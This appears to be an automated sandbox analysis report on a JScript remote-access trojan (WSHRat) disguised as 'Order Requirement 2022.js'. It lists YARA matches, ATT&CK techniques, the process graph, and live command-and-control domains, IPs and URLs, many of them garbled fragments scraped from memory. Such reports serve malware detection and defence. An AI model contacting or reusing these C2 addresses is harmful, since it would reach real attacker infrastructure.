              Source: Yara matchFile source: 0000000C.00000003.513971058.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.380177182.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.481502625.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.418142975.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.394046563.0000029D80067000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.355045063.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.439032554.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.374490943.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.823248453.0000029D80067000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.444103192.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.417946998.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.444077557.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.851673503.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.845820210.0000026E2A5DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.355010991.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.514256730.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.891143613.0000029DFD8AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.546431289.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.481574240.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 748, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 2804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3232, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 2772, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5776, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts11
              Windows Management Instrumentation              		21
              Registry Run Keys / Startup Folder              		111
              Process Injection              		1
              Masquerading              		OS Credential Dumping131
              Security Software Discovery              		Remote ServicesData from Local SystemExfiltration Over Other Network Medium11
              Non-Standard Port              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts52
              Scripting              		Boot or Logon Initialization Scripts21
              Registry Run Keys / Startup Folder              		111
              Process Injection              		LSASS Memory1
              Remote System Discovery              		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
              Remote Access Software              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)52
              Scripting              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
              Non-Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
              Obfuscated Files or Information              		NTDS2
              System Information Discovery              		Distributed Component Object ModelInput CaptureScheduled Transfer12
              Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 715072 Sample: Order Requirement 2022.js Startdate: 03/10/2022 Architecture: WINDOWS Score: 100 59 Sigma detected: Register Wscript In Run Key 2->59 61 Snort IDS alert for network traffic 2->61 63 Multi AV Scanner detection for domain / URL 2->63 65 10 other signatures 2->65 7 wscript.exe 3 6 2->7         started        11 wscript.exe 2 2->11         started        13 wscript.exe 2 2->13         started        15 3 other processes 2->15 process3 dnsIp4 39 Order Requirement ....js:Zone.Identifier, ASCII 7->39 dropped 41 C:\Users\user\...\Order Requirement 2022.js, ASCII 7->41 dropped 43 Order Requirement ....js:Zone.Identifier, ASCII 7->43 dropped 45 2 other malicious files 7->45 dropped 73 System process connects to network (likely due to code injection or exploit) 7->73 75 Detected WSHRat 7->75 77 JScript performs obfuscated calls to suspicious functions 7->77 81 2 other signatures 7->81 18 wscript.exe 8 7->18         started        22 wscript.exe 1 13 7->22         started        79 Wscript called in batch mode (surpress errors) 11->79 25 wscript.exe 11->25         started        27 wscript.exe 11->27         started        29 wscript.exe 13->29         started        53 javaautorun.duia.ro 15->53 file5 signatures6 process7 dnsIp8 47 jbd231.duckdns.org 109.248.144.237, 2022, 49701, 49703 DATACLUB-SE Russian Federation 18->47 31 wscript.exe 18->31         started        49 javaautorun.duia.ro 154.120.126.87, 5465 SpectranetNG Nigeria 22->49 37 C:\Users\user\AppData\...\CekIalTska.js, ASCII 22->37 dropped 51 109.248.150.138, 2022, 49726, 49728 DATACLUBLV Russian Federation 25->51 69 System process connects to network (likely due to code injection or exploit) 25->69 71 Wscript called in batch mode (surpress errors) 25->71 34 wscript.exe 25->34         started        file9 signatures10 process11 dnsIp12 55 javaautorun.duia.ro 31->55 57 javaautorun.duia.ro 34->57 67 System process connects to network (likely due to code injection or exploit) 34->67 signatures13

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Order Requirement 2022.js7%ReversingLabsScript.Trojan.Heuristic
              Order Requirement 2022.js7%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              jbd231.duckdns.org14%VirustotalBrowse
              javaautorun.duia.ro12%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://jbd231.duckdns.org:2022/is-ready320%Avira URL Cloudsafe
              http://jbd231.duckdns.org:2022/is-readyT0%Avira URL Cloudsafe
              http://jbd231.duckdns.org:2022/is-readyI0%Avira URL Cloudsafe
              http://jbd231.duckdns.org:2022/is-readyK0%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/VreM3:.0100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-readyL0%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/Vrew100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-readyXFwuXFxyb290XFxjaW12MiIpOw0KdmFy0%Avira URL Cloudsafe
              http://jbd231.duckdns.org:2022/is-readyG0%Avira URL Cloudsafe
              http://jbd231.duckdns.org:2022/is-ready_0%Avira URL Cloudsafe
              http://jbd231.duckdns.org:2022/is-readys.org:2022/is-ready0%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/Vrecnkgew0KhN100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/Vre63209-4053062332-100100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/Vre100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/Vre.duia.ro:5465/Vre100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/VreYWNlKCIl100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-ready30%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/Vred100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-ready-0%Avira URL Cloudsafe
              http://jbd231.duckdns.org:2022/is-ready.0%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/Vrecnkgew0K100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/Vrero6100%Avira URL Cloudmalware
              http://jbd231.duckdns.org/O?0%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/VreMC100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/Vreoh_AE100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-ready&0%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/VreY100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/Vresofdowches100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/Vrer100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-ready#X50%Avira URL Cloudsafe
              http://jbd231.duckdns.org:2022/is-readyD0%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/Vreo100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/VreConnectionKeep-Alive100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-ready?0%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/VredmFyIGZyhN100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-readyd80%Avira URL Cloudsafe
              http://jbd231.duckdns.org:20ecuritycenter2=0%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/Vrej100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/ZpbGU100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-readyady0%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/Vrel100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/Vre$K100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-readyh80%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/Vref100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-readys.org:2022/is-readypData0%Avira URL Cloudsafe
              http://jbd231.duckdns.org:2022/is-readyckdns.org:2022/is-ready0%Avira URL Cloudsafe
              http://jbd231.duckdns.org:2022/is-readyspecified0%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/Vreh100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-readyEM0%Avira URL Cloudsafe
              http://jbd231.duckdns.org:2022/is-readyadyEM0%Avira URL Cloudsafe
              http://jbd231.duckdns.org/0%Avira URL Cloudsafe
              http://jbd231.duckdns.org:2022/is-ready0%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/Vre:100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/VreMe100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-readym320%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/VreZXNwb25z100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/VreZXNwb25zf/100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/VreS100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-readysL80%Avira URL Cloudsafe
              http://jbd231.duckdns.org/10%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/VreN100%Avira URL Cloudmalware
              http://jbd231.duckdns.org/ilter-00000%Avira URL Cloudsafe
              http://jbd231.duckdns.org/on0%Avira URL Cloudsafe
              http://jbd231.duckdns.org:2022/is-readyas0%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/VreM100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/VredmFyIGZy100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-readyAN0%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/Vre#100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-readyed.0%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/Vre1_100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/Vres);100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-readye0%Avira URL Cloudsafe
              http://javaautorun.duia.ro:5465/Vre.100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/Vreoi100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/Vre0100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/VrehN100%Avira URL Cloudmalware
              http://javaautorun.duia.ro:5465/Vreor100%Avira URL Cloudmalware
              http://jbd231.duckdns.org:2022/is-readyady.0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              jbd231.duckdns.org
              		109.248.144.237
              		truetrueunknown
              javaautorun.duia.ro
              		154.120.126.87
              		truetrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://jbd231.duckdns.org:2022/is-readytrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://javaautorun.duia.ro:5465/VreM3:.0wscript.exe, 0000000C.00000002.854455926.000001531A0E6000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-readyTwscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org:2022/is-readyIwscript.exe, 0000000D.00000002.893254770.000001B9F4429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525194748.000001B9F4426000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org:2022/is-ready32wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org:2022/is-readyKwscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org:2022/is-readyLwscript.exe, 00000002.00000003.401571383.0000025291BD5000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/Vrewwscript.exe, 00000006.00000002.875779129.0000026E2AEF0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://javaautorun.duia.ro:5465/Vre63209-4053062332-100wscript.exe, 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-readyGwscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org:2022/is-readyXFwuXFxyb290XFxjaW12MiIpOw0KdmFywscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org:2022/is-ready_wscript.exe, 0000000D.00000002.882599346.000001B9F3D50000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org:2022/is-readys.org:2022/is-readywscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/Vrewscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://javaautorun.duia.ro:5465/Vre.duia.ro:5465/Vrewscript.exe, 00000004.00000002.882445640.0000020016851000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://javaautorun.duia.ro:5465/Vrecnkgew0KhNwscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://javaautorun.duia.ro:5465/VreYWNlKCIlwscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.846562471.0000026E2A810000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.827729174.0000029D80190000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-ready3wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/Vredwscript.exe, 00000004.00000002.892957672.0000020016F08000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-ready-wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org:2022/is-ready.wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/Vrecnkgew0Kwscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.846562471.0000026E2A810000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.827729174.0000029D80190000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.843831563.000001531A020000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org/O?wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.893638808.000001B9F444E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/Vrero6wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://javaautorun.duia.ro:5465/VreMCwscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://javaautorun.duia.ro:5465/wscript.exe, 0000000E.00000003.481502625.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.816513877.000000D86C2F2000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.546074627.000001E4563F2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://javaautorun.duia.ro:5465/Vreoh_AEwscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-ready&wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.886964153.0000025291B72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/VreYwscript.exe, 00000006.00000002.875779129.0000026E2AEF0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://javaautorun.duia.ro:5465/Vresofdowcheswscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://javaautorun.duia.ro:5465/Vrerwscript.exe, 00000006.00000002.856776176.0000026E2AE71000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-ready#X5wscript.exe, 0000000D.00000002.893254770.000001B9F4429000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org:2022/is-readyDwscript.exe, 0000000D.00000002.894277954.000001B9F44A7000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/Vreowscript.exe, 00000004.00000002.882445640.0000020016851000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.835362703.0000029D802A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.869237827.000001E456940000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://javaautorun.duia.ro:5465/VreConnectionKeep-Alivewscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-ready?wscript.exe, 00000002.00000003.401463583.0000025291BCB000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/VredmFyIGZyhNwscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-readyd8wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.893638808.000001B9F444E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org:20ecuritycenter2=wscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		low
              http://javaautorun.duia.ro:5465/Vrejwscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379274839.00000228B317E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://javaautorun.duia.ro:5465/ZpbGUwscript.exe, 00000008.00000003.394109169.0000029D8001A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://javaautorun.duia.ro:5465/Vre$Kwscript.exe, 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-readyadywscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/Vrelwscript.exe, 0000000C.00000002.858724337.000001531A102000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-readyh8wscript.exe, 0000000D.00000002.893638808.000001B9F444E000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/Vrefwscript.exe, 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-readys.org:2022/is-readypDatawscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org:2022/is-readyckdns.org:2022/is-readywscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org:2022/is-readyspecifiedwscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/Vrehwscript.exe, 00000004.00000002.882445640.0000020016851000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.835362703.0000029D802A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.869237827.000001E456940000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://jbd231.duckdns.org:2022/is-readyadyEMwscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org:2022/is-readyEMwscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://jbd231.duckdns.org/wscript.exe, 00000002.00000003.401450984.0000025291BC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.893140463.0000025291BBB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525315950.000001B9F448D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.893638808.000001B9F444E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://javaautorun.duia.ro:5465/Vre:wscript.exe, 0000000E.00000002.892699772.000001E4570B0000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
